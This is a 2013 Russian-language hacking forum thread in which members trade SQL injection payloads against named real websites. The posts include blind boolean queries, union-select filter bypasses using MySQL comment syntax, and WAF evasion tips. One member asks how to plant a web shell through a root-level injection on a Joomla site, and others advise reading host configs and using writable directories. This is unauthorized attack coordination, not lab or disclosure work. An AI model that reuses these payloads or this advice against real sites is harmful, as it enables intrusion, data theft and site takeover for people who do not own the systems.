HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #22721  
Старый 04.09.2013, 14:17
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:
И не выведешь. Тут слепая скуля.
Кстати тут удобно использовать метод
more1row
Смотри сам:
Код:
Code:
http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=4,1,(select+1+union+select+2))

No error

http://www.cigarettehouse.net/?action=page&name=NEWS&page=37+and+if(substr((@@version),1,1)=5,1,(select+1+union+select+2))

Error
А тем более с четвёрки не вытащишь -(

Кто может сказать, что за реагирование на *1

Код:
Code:
http://pereprava.com.ua/index.php?id=1*1
 
Ответить с цитированием

  #22722  
Старый 04.09.2013, 15:26
YaBtr
Guest
Сообщений: n/a
Провел на форуме:
132418

Репутация: 652
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
А тем более с четвёрки не вытащишь -(
Кто может сказать, что за реагирование на
*1
Код:
Code:
http://pereprava.com.ua/index.php?id=1*1
http://pereprava.com.ua/index.php?id=1*1 (Вывод страницы 1)

http://pereprava.com.ua/index.php?id=1*3 (Вывод страницы 3)

Отсюда следует,что, ВОЗМОЖНО, здесь присутствует инъекция
 
Ответить с цитированием

  #22723  
Старый 05.09.2013, 10:21
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Очередной фильтр SELECT

Код:
Code:
http://johnyboy.ru/?page=news&newsid=-999+union+/*!select*/+1,2,3,4,5,6+--+
но зараза оператора AND никак не хочет пропускать /*!and*/ и методом more1row воспользоваться не получится.
 
Ответить с цитированием

  #22724  
Старый 05.09.2013, 17:57
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
Очередной фильтр
SELECT
Код:
Code:
http://johnyboy.ru/?page=news&newsid=-999+union+/*!select*/+1,2,3,4,5,6+--+
но зараза оператора AND никак не хочет пропускать /*!and*/ и методом
more1row
воспользоваться не получится.
Так используйте что ни будь еще - логические операторы, арифметические, побитовые, сравнения...

Там, помимо основного WAF-а еще несколько фильтров, что они только не фильтруют...

Возможно такой синтаксис:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]130[/COLOR][COLOR="#007700"]++[/COLOR][COLOR="#0000BB"]div[/COLOR][COLOR="#007700"]+++(([/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"])+&[/COLOR][COLOR="#0000BB"]255[/COLOR][COLOR="#007700"])+

[/
COLOR][/COLOR
Но до раскрутки еще далеко, с полным фильтром на select ничего не получится.
 
Ответить с цитированием

  #22725  
Старый 06.09.2013, 03:30
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Имеется скуля с правами рута, файлы заливаются (проверил на /tmp), так же чтение этих файлов через load_file проходит, но вот хз как залиться, в корень на сам сайт не заливается, в папки tmp/logs тоже (джумла стоит там). Разные директории проверил, включая images, нифига. Может я что то не так делаю?)

зы /administrator/ 403, не залиться
 
Ответить с цитированием

  #22726  
Старый 06.09.2013, 06:40
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:
Имеется скуля с правами рута, файлы заливаются (проверил на /tmp), так же чтение этих файлов через load_file проходит, но вот хз как залиться, в корень на сам сайт не заливается, в папки tmp/logs тоже (джумла стоит там). Разные директории проверил, включая images, нифига. Может я что то не так делаю?)
зы /administrator/ 403, не залиться
Возможно прав нет, в большинстве случаев залиться можно только тогда, когда на какую то диру стоять права записи для others, например 777 и сервер в ней что-то исполняет - PHP, SSI, etc...

Надо что-то другое использовать - прочтите виртуальные хосты, другие файлы, конфиги, ищите там полезную инфу...
 
Ответить с цитированием

  #22727  
Старый 06.09.2013, 08:19
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:
Имеется скуля с правами рута, файлы заливаются (проверил на /tmp), так же чтение этих файлов через load_file проходит, но вот хз как залиться, в корень на сам сайт не заливается, в папки tmp/logs тоже (джумла стоит там). Разные директории проверил, включая images, нифига. Может я что то не так делаю?)
зы /administrator/ 403, не залиться
Если стоит sape, то у них в корне сайта должна быть врайтабельная директория для скриптов сапы, правда закрытая на исполнение .htaccess -ом. Попробуй.
 
Ответить с цитированием

  #22728  
Старый 06.09.2013, 17:49
narviss
Guest
Сообщений: n/a
Провел на форуме:
2851

Репутация: 0
По умолчанию

Можно ли что сделать с этой уязвимостью?

Цитата:
Сообщение от None  
http://www.v3toys.ru/index.php?nid=19109
 
Ответить с цитированием

  #22729  
Старый 08.09.2013, 23:58
Br@!ns
Guest
Сообщений: n/a
Провел на форуме:
179197

Репутация: 25
По умолчанию

Можно ли через havij крутить ссылки типа blabla.com/news/2013 ? Или обязателен уязвимый параметр типа =999 ?
 
Ответить с цитированием

  #22730  
Старый 09.09.2013, 03:14
m00c0w
Guest
Сообщений: n/a
Провел на форуме:
36927

Репутация: 5
По умолчанию

%Inject_Here%

http://www.itsecteam.com/files/havij/havij_help-english.pdf
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ